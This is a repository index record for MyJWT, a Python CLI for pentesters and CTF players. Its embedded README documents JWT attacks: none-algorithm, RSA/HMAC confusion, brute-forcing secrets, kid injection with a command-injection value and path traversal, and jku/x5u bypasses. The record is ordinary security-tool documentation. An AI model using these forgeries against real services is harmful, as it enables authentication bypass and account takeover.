{"id":13845890,"url":"https://github.com/tyki6/MyJWT","last_synced_at":"2025-07-12T03:32:51.036Z","repository":{"id":40572737,"uuid":"307492515","full_name":"tyki6/MyJWT","owner":"tyki6","description":"A cli for cracking, testing vulnerabilities on Json Web Token(JWT)","archived":false,"fork":false,"pushed_at":"2025-06-10T09:00:28.000Z","size":16257,"stargazers_count":134,"open_issues_count":3,"forks_count":18,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-07-11T03:49:12.710Z","etag":null,"topics":["blackarch","blackarch-packages","cli","ctf","jsonwebtoken","jwt","pentest","pentesting","pypi","python","rawsec","root-me","rootme","security","security-tools","websec"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/tyki6.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-10-26T20:11:56.000Z","updated_at":"2025-05-20T20:44:46.000Z","dependencies_parsed_at":"2023-10-01T21:24:30.574Z","dependency_job_id":"35b11842-c4c1-4f92-8fcd-b96370d0bb0b","html_url":"https://github.com/tyki6/MyJWT","commit_stats":{"total_commits":179,"total_committers":8,"mean_commits":22.375,"dds":0.6424581005586592,"last_synced_commit":"73c4d580e70de907352ad076ff70b137dd9e12e9"},"previous_names":["mbouamama/myjwt"],"tags_count":15,"template":false,"template_full_name":null,"purl":"pkg:github/tyki6/MyJWT","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tyki6%2FMyJWT","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tyki6%2FMyJWT/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tyki6%2FMyJWT/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tyki6%2FMyJWT/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/tyki6","download_url":"https://codeload.github.com/tyki6/MyJWT/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tyki6%2FMyJWT/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264922634,"owners_count":23683678,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["blackarch","blackarch-packages","cli","ctf","jsonwebtoken","jwt","pentest","pentesting","pypi","python","rawsec","root-me","rootme","security","security-tools","websec"],"created_at":"2024-08-04T17:03:39.722Z","updated_at":"2025-07-12T03:32:49.981Z","avatar_url":"https://github.com/tyki6.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"# MyJWT\n[![mBouamama](https://github.com/mBouamama/MyJWT/workflows/Unit%20Test/badge.svg)](https://github.com/mBouamama/MyJWT)\n[![PyPI](https://img.shields.io/pypi/v/myjwt)](https://pypi.org/project/myjwt/)\n[![BlackArch package](https://repology.org/badge/version-for-repo/blackarch/myjwt.svg)](https://repology.org/project/myjwt/versions)\n[![PyPI - Python Version](https://img.shields.io/pypi/pyversions/myjwt)](https://pypi.org/project/myjwt/)\n[![PyPI - Download](https://pepy.tech/badge/myjwt)](https://pepy.tech/project/myjwt)\n[![GitHub release (latest by date)](https://img.shields.io/github/v/release/mBouamama/MyJWT)](https://github.com/mBouamama/MyJWT/releases)\n[![Documentation Status](https://readthedocs.org/projects/myjwt/badge/?version=latest)](https://myjwt.readthedocs.io/en/latest/?badge=latest)\n[![Rawsec's CyberSecurity Inventory](https://inventory.raw.pm/img/badges/Rawsec-inventoried-FF5050_flat.svg)](https://inventory.raw.pm/)\n[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)\n[![codecov](https://codecov.io/gh/mBouamama/MyJWT/branch/master/graph/badge.svg?token=V7yZJ1bZV9)](https://codecov.io/gh/mBouamama/MyJWT)\n[![docstr_coverage](./img/docstr_coverage_badge.svg)](https://github.com/HunterMcGushion/docstr_coverage.git)\n[![codebeat badge](https://codebeat.co/badges/1599eda5-d82b-41a1-93a1-dc8c51afc33f)](https://codebeat.co/projects/github-com-mbouamama-myjwt-master)\n[![Updates](https://pyup.io/repos/github/mBouamama/MyJWT/shield.svg)](https://pyup.io/repos/github/mBouamama/MyJWT/)\n[![Known Vulnerabilities](https://snyk.io/test/github/mBouamama/MyJWT/badge.svg?targetFile=requirements.txt)](https://snyk.io/test/github/mBouamama/MyJWT?targetFile=requirements.txt)\n# Introduction\nThis cli is for pentesters, CTF players, or dev.\u003cbr\u003e\nYou can modify your jwt, sign, inject ,etc...\u003cbr\u003e\nCheck [Documentation](http://myjwt.readthedocs.io) for more information.\u003cbr\u003e\nIf you see problems or enhancement send an issue.I will respond as soon as possible.\nEnjoy :)\n\n# Documentation\nDocumentation is available at http://myjwt.readthedocs.io\n# Table of Contents\n- [Features](#features)\n- [Installation](#installation)\n- [Usage](#usage)\n- [Examples](#examples)\n- [Download](#download)\n- [Contribute](#contribute)\n- [ChangeLog](#change-log)\n# Features\n- copy new jwt to clipboard\n- user Interface (thanks [questionary](https://github.com/tmbo/questionary))\n- color output\n- modify jwt (header/Payload)\n- None Vulnerability\n- RSA/HMAC confusion\n- Sign a jwt with key\n- Brute Force to guess key\n- crack jwt with regex to guess key\n- kid injection\n- Jku Bypass\n- X5u Bypass\n\n# Installation\nTo install myjwt, simply use pip:\n```\npip install myjwt\n```\nTo run mywt from a docker image, run:\n```\ndocker run -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt\n\n# mount volume for wordlist\ndocker run -v $(pwd)/wordlist:/home/wordlist/ -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt\n# On Windows\ndocker run -v %CD%/wordlist:/home/wordlist/ -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt\n```\nTo install myjwt, on git:\n```\ngit clone https://github.com/mBouamama/MyJWT.git\ncd ./MyJWT\npip install -r requirements.txt\npython MyJWT/myjwt_cli.py --help\n```\n\nTo install myjwt on BlackArch:\n\n```\npacman -S myjwt\n```\n\n[![Packaging status](https://repology.org/badge/vertical-allrepos/myjwt.svg)](https://repology.org/project/myjwt/versions)\n\n# Usage\n```shell\n$ myjwt --help\nUsage: myjwt [OPTIONS] JWT\n\n This cli is for pentesters, CTF players, or dev.\n You can modify your jwt, sign, inject ,etc...\n Full documentation is at http://myjwt.readthedocs.io.\n If you see problems or enhancement send an issue.I will respond as soon as possible.\n Enjoy :)\n All new jwt will be copy to the clipboard.\n\nOptions:\n --version Show the version and exit.\n --full-payload TEXT New payload for your jwt.Json format Required.\n -h, --add-header TEXT Add a new key, value to your jwt header, if key\n is present old value will be replaced.Format:\n key=value.\n\n -p, --add-payload TEXT Add a new key, value to your jwt payload, if\n key is present old value will be\n replaced.Format: key=value.\n\n --sign TEXT Sign Your jwt with key given.\n --verify TEXT verify your key.\n -none, --none-vulnerability Check None Alg vulnerability.\n --hmac PATH Check RS/HMAC Alg vulnerability.\n --bruteforce PATH Bruteforce to guess the secret used to sign the\n token.\n\n -c, --crack TEXT regex to iterate all string possibilities to\n guess the secret used to sign the token.\n\n --kid TEXT Kid Injection sql\n --jku TEXT Jku Header to bypass authentication\n --x5u TEXT X5u Header to bypass authentication\n --crt TEXT For x5cHeader, force crt file\n --key TEXT For jku or x5c Header, force private key to\n your key file\n\n --file TEXT For jku Header and x5u Header, force file name\n --print Print Decoded JWT\n -u, --url TEXT Url to send your jwt.\n -m, --method TEXT Method use for send request to url.(Default\n GET).\n\n -d, --data TEXT Data send to your url.Format: key=value. if\n value = MY_JWT value will be replace by new\n jwt.\n\n -c, --cookies TEXT Cookies to send to your url.Format: key=value.\n if value = MY_JWT value will be replace by new\n jwt.\n\n --help Show this message and exit.\n```\n## Modify JWT\n\n| Option | Type | Example | help|\n| --------------------------- |:---------:|:--------:| ---:|\n| --ful-payload | JSON | {\"user\": \"admin\"} | New payload for your jwt.|\n| -h, --add-header | key=value | user=admin | Add a new key, value to your jwt header, if key is present old value will be replaced.|\n| -p, --add-payload | key=value | user=admin | Add a new key, value to your jwt payload, if key is present old value will be replaced.|\n\n## Check Your JWT (HS alg)\n\n| Option | Type | Example | help|\n--- | --- | --- | ---\n| --sign | text | mysecretkey | Sign Your jwt with your key\n| --verify | text | mysecretkey | Verify your key.\n\n## Exploit\n\n| Option | Type | Example | help|\n--- | --- | --- | ---\n| -none, --none-vulnerability | Nothing | | Check None Alg vulnerability.\n| --hmac | PATH | ./public.pem | Check RS/HMAC Alg vulnerability, and sign your jwt with public key.\n| --bruteforce | PATH | ./wordlist/big.txt | Bruteforce to guess th secret used to sign the token. Use txt file with all password stored(1 by line)\n| --crack | REGEX | \"[a-z]{4}\" | regex to iterate all string possibilities to guess the secret used to sign the token.\n| --kid | text | \"00; echo /etc/.passwd\" | Kid Injection sql\n| --jku | text | MYPUBLICIP | Jku Header to bypass authentication, use --file if you want to change your jwks file name, and --key if you want to use your own private pem\n| --x5u | text | MYPUBLICIP | For jku or x5c Header, use --file if you want to change your jwks file name, and --key if you want to use your own private pem\n\n## Send your jwt\n\n| Option | Type | Example | help|\n--- | --- | --- | ---\n| -u, --url | url | http://challenge01.root-me.org/web-serveur/ch59/admin| Url to send your jwt.\n| -m, --method | text | POST | Method use to send request to url.(Default: GET).\n| -d, --data | key=value | secret=MY_JWT | Data send to your url.Format: key=value. if value = MY_JWT value will be replace by your new jwt.\n| -c, --cookies | key=value | secret=MY_JWT | Cookies to send to your url.Format: key=value.if value = MY_JWT value will be replace by your new jwt.\n\n## Other\n\n| Option | Type | Example | help|\n--- | --- | --- | ---\n| --crt | PATH | ./public.crt| For x5cHeader, force crt file\n| --key | PATH | ./private.pem| For jku or x5c Header, force private key to your key file\n| --file | text | myfile| For jku Header, force file name without .json extension\n| --print | Nothing | | Print Decoded JWT\n| --help | Nothing | | Show Helper message and exit.\n| --version | Nothing | | Show Myjwt version\n\n# Examples\n- [Modify Your jwt](#modify-your-jwt)\n- [None Vulnerabilty Check](#none-vulnerability)\n- [Sign Key](#sign-key)\n- [Brute Force Signature](#brute-force)\n- [RSA/HMAC Confusion](#rsahmac-confusion)\n- [Kid Injection](#kid-injection)\n- [Send your new Jwt to url](#send-your-new-jwt-to-url)\n- [Jku Vulnerability](#jku-vulnerability)\n- [X5u Vulnerability](#x5u-vulnerability)\n## Modify your Jwt\n### CLI\n```\nmyjwt YOUR_JWT --add-payload \"username=admin\" --add-header \"refresh=false\"\n```\n### Code\n```\nfrom myjwt.modify_jwt import add_header, change_payload\nfrom myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt\n\njwt_json = jwt_to_json(jwt)\njwt_json = add_header(jwt_json, {\"kid\": \"001\"})\njwt_json = change_payload(jwt_json, {\"username\": \"admin\"})\njwt = encode_jwt(jwt_json) + \".\" + jwt_json[SIGNATURE]\n```\nFull example here: [01-modify-jwt](https://github.com/mBouamama/MyJWT/blob/master/examples/01-modify-jwt/modify-jwt.py)\n## None Vulnerability\n### CLI\n```\nmyjwt YOUR_JWT --none-vulnerability\n```\n### CODE\n```\nfrom myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt\nfrom myjwt.vulnerabilities import none_vulnerability\njwt_json = jwt_to_json(jwt)\njwt = none_vulnerability(encode_jwt(jwt_json) + \".\" + jwt_json[SIGNATURE])\n```\nFull example here: [02-none-vulnerability](https://github.com/mBouamama/MyJWT/blob/master/examples/02-none-vulnerability/none-vulnerability.py)\n## Sign Key\n### CLI\n```\nmyjwt YOUR_JWT --sign YOUR_KEY\n```\n### CODE\n```\nfrom myjwt.modify_jwt import signature\nfrom myjwt.utils import jwt_to_json\nkey = \"test\"\njwt = signature(jwt_to_json(jwt), key)\n```\nFull example here: [03-sign-key](https://github.com/mBouamama/MyJWT/blob/master/examples/03-sign-key/sign-key.py)\n## Brute Force\n### CLI\n```\nmyjwt YOUR_JWT --bruteforce PATH\n```\n### CODE\n```\nfrom myjwt.vulnerabilities import bruteforce_wordlist\nwordlist = \"../../wordlist/common_pass.txt\"\nkey = bruteforce_wordlist(jwt, wordlist)\n```\nFull example here: [04-brute-force](https://github.com/mBouamama/MyJWT/blob/master/examples/04-brute-force/brute-force.py)\n## Crack\n### CLI\n```\nmyjwt YOUR_JWT --crack REGEX\n```\n## RSA/HMAC Confusion\n### CLI\n```\nmyjwt YOUR_JWT --hmac FILE\n```\n### CODE\n```\nfrom myjwt.vulnerabilities import confusion_rsa_hmac\nfile = \"public.pem\"\njwt = confusion_rsa_hmac(jwt, file)\n```\nFull example here: [05-rsa-hmac-confusion](https://github.com/mBouamama/MyJWT/blob/master/examples/05-rsa-hmac-confusion/rsa-hmac-confusion.py)\n## Kid Injection\n### CLI\n```\nmyjwt YOUR_JWT --kid INJECTION\n```\n### Code\n```\nfrom myjwt.modify_jwt import signature\nfrom myjwt.utils import jwt_to_json\nfrom myjwt.vulnerabilities import inject_sql_kid\n\ninjection = \"../../../../../../dev/null\"\nsign = \"\"\njwt = inject_sql_kid(jwt, injection)\njwt = signature(jwt_to_json(jwt), sign)\n```\nFull example here: [06-kid-injection](https://github.com/mBouamama/MyJWT/blob/master/examples/06-kid-injection/kid-injection.py)\n\n## Send your new Jwt to url\n\n### CLI\n```\nmyjwt YOUR_JWT -u YOUR_URL -c \"jwt=MY_JWT\" --non-vulnerability --add-payload \"username=admin\"\n```\n\n## Jku Vulnerability\n### CLI\n```\nmyjwt YOUR_JWT --jku YOUR_URL\n```\n### Code\n```\nfrom myjwt.vulnerabilities import jku_vulnerability\nnew_jwt = jku_vulnerability(jwt=jwt, url=\"MYPUBLIC_IP\")\nprint(jwt)\n```\nFull example here: [07-jku-bypass](https://github.com/mBouamama/MyJWT/blob/master/examples/07-jku-bypass/jku-bypass.py)\n## X5U Vulnerability\n### CLI\n```\nmyjwt YOUR_JWT --x5u YOUR_URL\n```\n### Code\n```\nfrom myjwt.vulnerabilities import x5u_vulnerability\nnewJwt = x5u_vulnerability(jwt=jwt, url=\"MYPUBLIC_IP\")\nprint(jwt)\n```\nFull example here: [08-x5u-bypass](https://github.com/mBouamama/MyJWT/blob/master/examples/08-x5u-bypass/x5u-bypass.py)\n\n# Download\nCheck github releases. Latest is available at https://github.com/mBouamama/MyJWT/releases/latest\n# Contribute\n- Fork this repository or clone it\n- Create a new branch (feature, hotfix, etc...)\n- Make necessary changes and commit those changes\n- Check lint with `make lint`\n- Check unit_test with `make test`\n- Send Pull Request\nI will check as Soon as Possible.\n\n# Change log\n\nThe log's become rather long. It moved to its own file.\n\nSee [CHANGES](https://github.com/mBouamama/MyJWT/blob/master/CHANGELOG.md).\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftyki6%2FMyJWT","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftyki6%2FMyJWT","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftyki6%2FMyJWT/lists"}